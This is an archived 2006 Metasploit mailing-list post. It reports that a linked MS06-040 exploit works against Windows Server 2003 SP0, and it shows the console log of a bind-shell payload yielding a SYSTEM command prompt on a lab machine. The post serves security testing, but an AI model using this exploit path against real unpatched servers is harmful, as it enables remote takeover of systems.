Metasploit mailing list archives
MS06-040 Exploit for Windows Server 2003 SP0
From: jerome.athias at free.fr (Jerome Athias)
Date: Thu, 14 Sep 2006 09:16:40 +0200
Hi, http://milw0rm.com/exploits/2355 successfully tested against Windows 2003 Web Edition SP0 US msf netapi_win2003(win32_bind) > exploit [*] Starting Bind Handler. [*] Sending request... [*] The server rejected it, trying again... [*] Got connection from 192.168.0.5:34047 <-> 192.168.0.30:4444 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.30 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.254 C:\WINDOWS\system32> PS: tested as is against 2003 Standard Edition FRench SP0 - not working (/return addresses ...) /JA
Current thread:
- MS06-040 Exploit for Windows Server 2003 SP0 Jerome Athias (Sep 14)